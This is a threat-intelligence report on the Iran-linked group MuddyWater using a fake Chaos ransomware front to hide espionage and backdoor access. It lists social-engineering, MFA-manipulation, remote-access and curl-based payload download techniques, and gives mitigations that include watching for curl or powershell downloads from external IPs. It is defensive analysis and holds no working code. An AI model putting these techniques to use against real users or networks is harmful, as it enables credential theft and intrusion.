Full Report
MOIS-linked cyber outfit puts on a ransomware show to disguise the wide-open backdoor behind the scenes
Analysis Summary
# Threat Actor: MuddyWater
## Attribution & Identity
* **Actor Name:** MuddyWater
* **Aliases:** Static Kitten, Mercury, Seedworm
* **Affiliation:** Ministry of Intelligence and Security (MOIS) of Iran
* **Confidence Level:** Medium confidence attribution by Rapid7 researchers.
* **Associations:** Historically associated with the "Agonizing Serpens" persona and now observed masquerading as affiliates of the **Chaos Ransomware** group.
## Activity Summary
The reported campaign involves a state-sponsored espionage operation disguised as a financially motivated ransomware attack. Observed in early 2026, the actor utilized a blend of social engineering and technical intrusion to gain access to Western networks. Unlike typical ransomware attacks, no encryption occurred; instead, the actor used the "Chaos" ransomware brand as a false flag to provide plausible deniability while exfiltrating sensitive data and maintaining long-term backdoor access.
## Tactics, Techniques & Procedures
* **Social Engineering:** Phishing campaigns combined with "expert persuasion" to convince targets to share screens.
* **Credential Harvesting:** Instructing users to type credentials into local plaintext files and deploying phishing pages mimicking internal portals.
* **MFA Manipulation:** Convincing targets to modify Multi-Factor Authentication (MFA) settings to allow attacker-controlled devices to authenticate.
* **Remote Access:** Deployment of legitimate Remote Management Tools (AnyDesk) to facilitate persistence.
* **Lateral Movement:** Execution of commands via Remote Desktop Protocol (RDP) using compromised valid credentials.
* **Defense Evasion:** Use of a malicious Microsoft WebView2 loader to disguise malicious traffic as legitimate application activity.
* **False Flag Operations:** Use of an Onion link leading to the Chaos ransomware Data Leak Site (DLS) and sending internal "extortion" emails to misdirect incident responders.
* **Persistence:** Use of the `curl` command to download secondary payloads.
## Targeting
* **Sectors:** Western Government, Banking networks, and general enterprise.
* **Geography:** Western nations (implied global reach based on MOIS history).
* **Victims:** Specific organizations were not named, but the article notes intrusions affecting Western government and banking infrastructure.
## Tools & Infrastructure
* **Malware:**
* **Darkcomp:** A backdoor malware used for command execution and persistence.
* **Microsoft WebView2 Loader:** Malicious loader used to mask traffic.
* **Software:** AnyDesk (Remote Desktop Software), curl (data transfer).
* **Infrastructure:**
* Chaos Ransomware Data Leak Site (DLS) on the dark web (h[t]tp[:]//[redacted][.]onion).
* Encrypted configuration files for C2 instructions.
## Implications
* **Strategic Misdirection:** By posing as ransomware actors, MuddyWater forces defenders to prioritize ransomware remediation (searching for encryptors) while the group focuses on quiet data exfiltration and maintaining backdoors.
* **Plausible Deniability:** Using established criminal "brands" like Chaos allows the Iranian state to distance itself from geopolitical friction caused by cyberespionage.
* **Prepositioning:** The activity may serve as "prepositioning" for future destructive attacks, where the actor maintains access to critical infrastructure under the guise of periodic criminal activity.
## Mitigations
* **User Training:** Educate employees never to share credentials via screensharing or enter passwords into local text files at the request of "support" or unknown entities.
* **MFA Hardening:** Implement phish-resistant MFA (FIDO2/WebAuthn) and restrict users' ability to self-register or modify MFA devices without administrative approval.
* **RDP Security:** Restrict RDP access to specific management JumpSec hosts and enforce VPN requirements with strict conditional access.
* **Execution Monitoring:** Monitor for the unauthorized use of commercial remote access tools (AnyDesk, TeamViewer) and unusual `curl` or `powershell` commands downloading files from external IPs.
* **Process Auditing:** Audit the use of WebView2 controls within the environment to identify anomalous or unsigned loaders.